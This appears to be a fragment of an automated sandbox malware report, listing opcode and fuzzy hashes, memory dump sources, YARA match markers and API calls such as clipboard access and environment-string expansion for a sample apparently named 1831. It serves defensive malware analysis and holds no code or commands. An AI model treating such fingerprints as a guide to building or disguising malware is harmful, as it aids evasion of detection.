                                                                                                    • Instruction ID: 7b6863c9c9260bd0558c6f806dd5f9e3415f7290086a878cc0b8c3271b95cfd7
                                                                                                    • Opcode Fuzzy Hash: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
                                                                                                    • Instruction Fuzzy Hash: 6EF0F936544304ABE1105B459C40D3777AEFB9E728F104319F715332A1E772ED2197A9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b742c9dc481357075cde75226765a26651ce40b82d6343e18e23e0a7f9609d23
                                                                                                    • Instruction ID: 3de1db2f2e8ffe20251b099e71f2c4b06663c905ad25401a7f87df4293252e50
                                                                                                    • Opcode Fuzzy Hash: b742c9dc481357075cde75226765a26651ce40b82d6343e18e23e0a7f9609d23
                                                                                                    • Instruction Fuzzy Hash: D4F0D176944208AB96244B059C40D3777BEFB8E768F100338ED28221A1E333BD519BA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
                                                                                                    • Instruction ID: e42e4ed7444637acb9172daae2f8c068fd141d83b222e9267d2cdac5258e14ad
                                                                                                    • Opcode Fuzzy Hash: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
                                                                                                    • Instruction Fuzzy Hash: 23F0B43AA5D7504EE3048EE8D48436BFBD2EB81304F19947DC6C4A7581CAB998858B92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
                                                                                                    • Instruction ID: e23c4aed3e359ff0919f98341f407045f5ec6c2b6b54e8b2eadb2e6be647d692
                                                                                                    • Opcode Fuzzy Hash: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
                                                                                                    • Instruction Fuzzy Hash: 8EF05C6254A3404F87150E5988D03B8F7A74B97215708A56DD8D54719BC631C549E758
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
                                                                                                    • Instruction ID: e326c345bde377aa6e8bb6850dbeabc37b2ed60f2dbed3116b3c9db056a2dc49
                                                                                                    • Opcode Fuzzy Hash: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
                                                                                                    • Instruction Fuzzy Hash: 6EF082B1A0034ADFCF219F44C841AA7B7F5FF86350F044455F8864B220E735C551EB56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
                                                                                                    • Instruction ID: 0b9b9b8d1acbc421fb4df588ac428151bad35d72c9f52a6cfd89ee711df870cb
                                                                                                    • Opcode Fuzzy Hash: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
                                                                                                    • Instruction Fuzzy Hash: C3F0A932A193508BC310DF268A0036BF7E1BFC6B04F48CC69D4D997210E278C5028756
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
                                                                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction ID: 68bc2438b9170b7e8c68db7a15aaad1cd2d7eec32e55d38bfe2f2de7c0c16392
                                                                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction Fuzzy Hash: D8D097A05083A20F4B898E3804A0837FBE4E943112B08148EE0D2E3414C321D8019258
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
                                                                                                    • Instruction ID: ad7c06e57a303dba94bcd7d2aa197efc7e92ac1f9ab750114ca6719ae142e1d8
                                                                                                    • Opcode Fuzzy Hash: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
                                                                                                    • Instruction Fuzzy Hash: 77B048389482409B9604CF00E88042AF375AA8B200F14A418E84933310CA30E8008A89
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 1006321803-0
                                                                                                    • Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                                                    • Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
                                                                                                    • Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                                                    • Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 1006321803-0
                                                                                                    • Opcode ID: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
                                                                                                    • Instruction ID: c9a4afe6a29076e97ca623fc3d36d652a45449244f2f884f901ea7e02048a3d6
                                                                                                    • Opcode Fuzzy Hash: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
                                                                                                    • Instruction Fuzzy Hash: 56417C7114C3818FD300EF7894883AEBFE1AB82314F09492DE4D58B2C1D7B9958AD763
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: $%$p:#$MO
                                                                                                    • API String ID: 237503144-3521940197
                                                                                                    • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
                                                                                                    • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 020F5884
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: $%$p:#$MO
                                                                                                    • API String ID: 237503144-3521940197
                                                                                                    • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction ID: c0e96cbee9336228d481724a3f098cde9fbab6367f1fdbb76a62b9dbcf266781
                                                                                                    • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction Fuzzy Hash: B741AE765583448BE310CF25C89475FBBE2FBC5758F16892CE4D49B680C6B9CA0A8B86